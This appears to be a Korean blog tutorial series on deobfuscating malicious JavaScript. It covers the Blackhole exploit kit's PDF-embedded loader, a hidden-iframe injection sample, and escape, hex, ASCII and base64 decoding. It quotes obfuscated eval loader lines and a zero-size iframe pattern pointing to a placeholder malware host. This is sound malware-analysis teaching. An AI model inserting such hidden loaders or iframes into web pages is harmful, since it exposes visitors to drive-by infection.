글
[5] 블랙홀 툴킷의 PDF 난독화 풀이
[5] 블랙홀 툴킷의 PDF 난독화 풀이
1. Blackhole Exploit Toolkit 이란?
악성코드 유포에 이용되는 Web exploit Toolkit 중에서도 가장 많이 알려져 있고, 악성코드 유포에
이용되는 빈도수도 꾸준히 상위권을 유지하고 있다. 현재는 2.0버전이 이용되고 있으며, pdf, java 등 다양한 취약점을 이용한다.
2. Blackhole Toolkit의 난독화
블랙홀 툴킷을 분석하면 다양한 난독화 기법이 이용되는 것을 볼 수 있다. 그 중 에서도 메인페이지 부분과 pdf파일에 삽입된 자바스크립트 난독화 부분이 있는데, 특히 pdf 부분은 시간이 지날수록 조금씩 어렵게 바뀌고 있다.
3. PDF 파일에 삽입된 자바스크립트 난독화 분석.
2013년 5월 10일 확인된 blackhole toolkit의 샘플 중 pdf 난독화 부분을 확인해 보겠다.
3.1 분석을 위해 수집한 패킷 샘플에서 PDF 파일 추출
[그림 1] 샘플패킷에서 PDF파일 추출
3.2 악성 PDF 파일에서 자바스크립트 추출
[그림 2] PDF파일에서 자바스크립트 분리하기
1) 그림에서 ①의 Load 버튼을 클릭하여 저장한 PDF파일을 불러온다
2) 그림에서 ②부분에 표시된 Objects을 클릭하면 ③ 부분에 내용이 표시된다.
3) Objects를 하나씩 클릭하여 의심스러운 내용이 포함된 것을 찾는다
4) 아래그림 처럼 분리된 자바스크립트를 확인할 수 있다
[그림 3] 분리된 자바스크립트
3.3 악성 스크립트 분석
3.3.1 스크립트 구조
[그림 4] 악성 스크립트의 구조
1) 난독화된 데이터 부분 a는 ZA( )함수들로 이루어져 있는 배열이다.
2) 이것은 첫 번째 스크립트 부분의 마지막 줄에 있는 function ZA(a)에 의해 아스키코드로
변환된다.
3) 아스키코드로 변환된 것은 다시 두 번째 스크립트 부분에 의해 문자열로 변환되어 실행된다.
3.3.2 첫 번째 스크립트 부분 분석
|
if((this.getSaveItem+"")[0]=="f")if(ImageField1.ZZA(321,513613,"a")===0) {z=this;zz="y";x='eI';} // if조건이 만족할 때 {z=this;zz="y";x='eI';}인데, 여기서는 스크립트만 가져왔기 때문에 조건이 성립하지 않아 스크립트가 동작하지 않는다. 실행되도록 하기 위해 if 절을 주석 처리하겠다
dd="Code"; ddd="ar"; s="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@yiODshOxsTLbKSJljyjNibt3tb23t"; xx=s[2]+'al'; // 위의 4줄은 메인 부분을 보기 어렵게 하기 위해 쪼개놓은 코드라고 생각하면 된다. 메인 부분을 이 부분들을 보고 수정하면 원래 복호화 코드가 된다
function ZZA(){return 0;} // if 절을 만족시키기 위해 사용하는 코드
function ZA(a){return z["\x65"+xx]("\x70ar"+"s"+x+s[0]+s[1])(a,26);} // 메인 부분 1, 이 부분을 위의 내용들을 참고하여 수정하면 아래처럼 된다 ð function ZA(a){return this.eval(parseInt(a,26);} |
3.3.3 두 번째 스크립트 부분 분석
|
if((z.getSaveItem+"")[0]=="f")if(zz=="y")if(020===0x10) // 첫 번째 부분과 동일한 이유로 if절은 주석 처리한다
z["\x65"+xx](String["fromCh"["conca"+s[3]](ddd,dd)]["appl"["conca"+s[3]](zz)](String,a)); //메인 부분 2, 이 부분도 위의 내용들을 참고하여 수정하면 아래처럼 된다
ð this.eval(String.fromCharCode.apply(String,a)); |
3.3.4 복호화 데이터 출력
- 스크립트 분석한 것을 적용하면 아래와 같다
[그림 5] 간결화한 스크립트
1) 문자열로 확인하기 위해 스크립트가 실행되는 두 번째 eval을 alert으로 변경 후 실행한다
- alert으로 수정하여 실행하면 아래처럼 복호화된 데이터를 확인할 수 있다
[그림 6] 복호화 결과
1) 결과를 확인하면 Shallcode가 포함된 스크립트를 확인 할 수 있다
3.4 shallcode 추출 및 악성코드 유포 URL 확인
- 복호화 결과에서 우리가 필요한 shallcode 부분만 document.write를 이용하여 추출한다
[그림 6] 스크립트에서 Shallcode 부분 추출
1) 실제로 동작하는 Shallcode 부분만 추출하기 위해 나머지 부분은 주석처리 후 Shallcode가
저장되는 변수를 확인한다
- Malzilla Tool을 이용하여 최종 악성코드 유포지 확인
[그림 7] Mallzilla를 이용한 악성코드 유포지 확인
1) Shallcode를 분석하기 위해서는 일반적으로 해당부분을 파일로 만들어 ollydbg에서 분석한다.
하지만 여기서는 간단하게 malzilla를 이용하는 방법을 알아보았다.
2) 일반적으로 Shallcode를 malzilla로 확인 시 Xor 연산이 되어 바로 보이지 않는 경우가 많지만,
해당 샘플에서는 악성코드 유포지가 바로 확인되었다
[참고] Shallcode를 실행파일로 만들어주는 사이트: http://sandsprite.com/shellcode_2_exe.php
'난독화 > 난독화 강좌' 카테고리의 다른 글
| [7] 자바스크립트의 함수 이해하기 (0) | 2013.05.19 |
|---|---|
| [6] 난독화에 자주 등장하는 자바스크립트 함수 1 (0) | 2013.05.17 |
| [4] 난독화 연습 문제풀이 따라하기 I (4) | 2013.05.08 |
| [3] 자바스크립트 난독화 기초 2 (0) | 2013.05.04 |
| [2] 자바스크립트 난독화 Tool (0) | 2013.05.04 |
글
[4] 난독화 연습 문제풀이 따라하기 I
[4] 난독화 연습 문제풀이 따라하기 I
1. 기본적인 난독화 풀이 방법을 통한 풀이
※ 해당 난독화 기법은 2012년도에 실제 악성코드 유포에 이용되었던 것으로, 설명에 이용하기 위해
악성URL 대신 블로그 주소를 넣어 샘플을 만들어 실습하였습니다.
1.1 위/변조된 사이트에서 악성 자바스크립트 확인
- 정상사이트지만 html 종료 후 비정상적으로 삽입된 의심 스크립트 확인
[그림 1] 의심스크립트 확인
1.2 의심스크립트만 분리 후 실행화면
- 의심스크립트 실행 시 특정 URL로 접속을 시도한다
☞ 실제 악성스크립트에서는 width=0, height=0으로 설정된 iframe이 삽입되어 아래처럼 연결화면이
나오지는 않았지만, 이해하기 쉽게 하기위해 특정 URL로 연결동작이 보이도록 변경하였다.
[그림 2] 스크립트 실행 시 특정URL 접속 확인
1.3 의심스크립트 분석
- alert을 이용한 문자열 확인
[그림 3] 의심스크립트 정리
① 의심 스크립트만 분리하여 저장 후 보기 좋게 나눈다
② A 부분이 document.write와 unescape를 통하여 어떤 동작하는 것으로 의심되기 때문에
document.write를 alert으로 변경하여 문자열로 확인시도 한다
- 실행 결과
[그림 4] A부분 결과 값
- A부분 결과 값를 [그림3]의 A부분에 삽입
[그림 5] A부분결과 값 삽입
- 결과 부분을 보기 좋게 정리
[그림 6] 스크립트 정리
① function 부분을 보기좋게 정리하면 document.write 부분이 의심스러워 보인다
② document.write를 alert으로 변경하여 결과값을 문자열로 확인시도 한다
- 실행 결과
[그림 7] 최종 결과 값 확인
1.4 의심스크립트 분석 결과
- 의심스크립트 분석결과, 특정사이트로 연결하는 iframe이 난독화된 스크립트로 확인
- 실제 악성코드에서는 width=0, height=0으로 설정되어 사용자가 인지하지 못한 상태에서
악성 URL로 연결을 시도 후 악성파일을 다운로드
강좌4_샘플.zip
* 해당 글에서 분석한 난독화 샘플이 필요하시면 댓글 달아 주시면 보내드리겠습니다.
→ 파일 첨부하였습니다. (받아가시고 댓글 부탁드려요 ^^)
'난독화 > 난독화 강좌' 카테고리의 다른 글
| [6] 난독화에 자주 등장하는 자바스크립트 함수 1 (0) | 2013.05.17 |
|---|---|
| [5] 블랙홀 툴킷의 PDF 난독화 풀이 (2) | 2013.05.13 |
| [3] 자바스크립트 난독화 기초 2 (0) | 2013.05.04 |
| [2] 자바스크립트 난독화 Tool (0) | 2013.05.04 |
| 난독화 스터디 시작!! (0) | 2013.05.03 |
글
[3] 자바스크립트 난독화 기초 2
[3] 자바스크립트 난독화 기초 2
1. Iframe Tag를 이용한 악성코드 유포
1.1 일반적인 악성코드 유포 패턴
예제 1)
| <iframe src=http://[악성코드 유포사이트 경로] width=0 height=0></iframe> |
① 정상적으로 서비스되고 있는 웹사이트를 해킹하여 소스코드에 iframe을 삽입
② 악성코드 유포사이트를 보이지 않게 하기위해 “width=0 height=0”로 설정
③ 이런 악성코드가 삽입된 사이트를 위/변조 사이트라고 하며, 이런 사이트 접속 시
사용자는 인지하지 못한 상태에서 악성코드에 감염
* iframe Tag는 정상사이트에서도 사용하기 때문에, 있다고 반드시 악성은 아니다
1.2 해커 입장에서 “예제1” 의 문제점
① 보안장비에서 패턴을 통하여 탐지 가능하다
② 보안담당자가 소스코드만 확인하여도 쉽게 악성코드 유포지를 알 수 있다
ð 때문에 난독화를 통하여 보안장비 우회 및 분석시간이 오래 걸리도록 한다
2. 같은 의미! 다른 형태!
2.1. 동일한 의미를 가진 여러 형태의 패턴
예제 2)
|
ex 1) <iframe src=http://café.naver.com width=800 height=500></iframe>
ex 2) <script> a="<iframe src";b="=http://caf";c="e.nav"; d="er.com width";e="=800 heigh"; f="t=500></iframe>"; document.write(a+b+c+d+e+f); </script>
|
① ex 1) 과 ex 2) 는 다른형태를 가지고 있지만, 동일한 행위를 한다
예제 3)
|
ex 1) a="%3Ciframe%20src%3Dhttp%3A//cafe.naver.com%20width%3D800%20height%3D500%3E %3C/iframe%3E"
b="3c696672616d65207372633d687474703a2f2f636166652e6e617665722e636f6d2077696474 683d383030206865696768743d3530303e3c2f696672616d653e";
c="60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,99,97,102,101,46,110, 97,118,101,114,46,99,111,109,32,119,105,100,116,104,61,56,48,48,32,104,101,105,103,104,116, 61,53,48,48,62,60,47,105,102,114,97,109,101,62";
d="PGlmcmFtZSBzcmM9aHR0cDovL2NhZmUubmF2ZXIuY29tIHdpZHRoPTgwMCBoZWlnaHQ9 NTAwPjwvaWZyYW1lPiA=";
|
① a, b, c, d는 모두 다른 형태이지만. 동일한 의미를 가지고 있다.
② 예제 3)의 형태는 기본적인 형태이므로 보면 어떤 코드인지 알 수 있도록 해야 한다
3. 난독화에 많이 이용되는 기본 패턴
3.1. escape와 unescape
예제 4)
|
<script> a="%3Ciframe%20src%3Dhttp%3A//cafe.naver.com%20width%3D800%20height%3D500%3E%3C/iframe%3E"; s=unescape(a); //-- a를 unescape로 변환하여 s에 저장 document.write(s); </script>
## 결과 cafe.naver.com 으로 접속 시도한다
|
① document.write는 문자열로 html에 반환하기 때문에 iframe이 실행된다
- 문자열을 보고 싶다면, alert 이나 xmp tag를 이용하면 된다
② a는 escape로 난독화되어 있기 때문에 unescape를 이용하여 복호화 하였다
3.2. HEX Code
b는 HEX Code이다. Hex는 기본적으로 알고 있을 것이다. 하지만 해당 코드가 hex인줄 몰랐다면
익숙하지는 않은 것이다.
예제 5)
|
<script> b="3c696672616d65207372633d687474703a2f2f636166652e6e617665722e636f6d207769647468 3d383030206865696768743d3530303e3c2f696672616d653e"; var s=""; for(i=0;i<b.length;i+=2) {s+=String.fromCharCode(parseInt(b.substring(i,i+2),16))}; document.write(s); </script> ## 결과 cafe.naver.com 으로 접속 시도한다 (예제 4번과 동일한 이유)
|
① 위와 같은 스크립트를 이용하여 복호화 할 수 있다
② 예제 4번과 동일한 방법으로 복호화된 문자열을 볼 수 있다
3.3. ASCII Code
c는 아스키코드이다. 숫자, 문자, 특수기호에 번호를 부여한 것이라 생각하면 된다
예제 6)
|
<script> c="60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,99,97,102,101,46,110,97, 118,101,114,46,99,111,109,32,119,105,100,116,104,61,56,48,48,32,104,101,105,103,104,116,61,53, 48,48,62,60,47,105,102,114,97,109,101,62"; s=""; c=c.split(",") for (i=0;i<c.length;i++){s+=String.fromCharCode(c[i]);} document.write(s); </script> ## 결과 cafe.naver.com 으로 접속 시도한다 (예제 4번과 동일한 이유)
|
① 위와 같은 스크립트를 이용하여 복호화 할 수 있다
② 예제 4번과 동일한 방법으로 복호화된 문자열을 볼 수 있다
3.4. Base64 Code
d는 Base64 Code이다. 전자메일에서 사용하는 64진수 코드라고 보면 된다.
예제 7)
|
<script> str="PGlmcmFtZSBzcmM9aHR0cDovL2NhZmUubmF2ZXIuY29tIHdpZHRoPTgwMCBoZWlnaHQ 9NTAwPjwvaWZyYW1lPiA="; var b64c = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg'+'hijklmnopqrstuvwxyz0123456789+/='; var b64d = '', chr1, chr2, chr3, enc1, enc2, enc3, enc4; str = str.replace(/[^a-z0-9+/=]/gi, ''); for (var i=0; i<str.length;) { enc1 = b64c.indexOf(str.charAt(i++)); enc2 = b64c.indexOf(str.charAt(i++)); enc3 = b64c.indexOf(str.charAt(i++)); enc4 = b64c.indexOf(str.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; b64d = b64d + String.fromCharCode(chr1); if (enc3 < 64) { b64d += String.fromCharCode(chr2); } if (enc4 < 64) { b64d += String.fromCharCode(chr3); } } document.write(b64d); </script> ## 결과 cafe.naver.com 으로 접속 시도한다 (예제 4번과 동일한 이유)
|
① 위와 같은 스크립트를 이용하여 복호화 할 수 있다
② 예제 4번과 동일한 방법으로 복호화된 문자열을 볼 수 있다
4. 간단하게 디코딩 하기
4.1. TRANSLATOR, BINARY
코드에 익숙해지기 위해 자바스크립트로 디코딩을 해보았다. 하지만 어떤 코드인지 안다면
아래의 사이트에서 간단하게 모두 디코딩 할 수 있다
바로가기: http://home.paulschou.net/tools/xlate/
[그림1] 디코딩 화면
'난독화 > 난독화 강좌' 카테고리의 다른 글
| [5] 블랙홀 툴킷의 PDF 난독화 풀이 (2) | 2013.05.13 |
|---|---|
| [4] 난독화 연습 문제풀이 따라하기 I (4) | 2013.05.08 |
| [2] 자바스크립트 난독화 Tool (0) | 2013.05.04 |
| 난독화 스터디 시작!! (0) | 2013.05.03 |
| [1] 자바스크립트 난독화 기초 (3) | 2013.05.03 |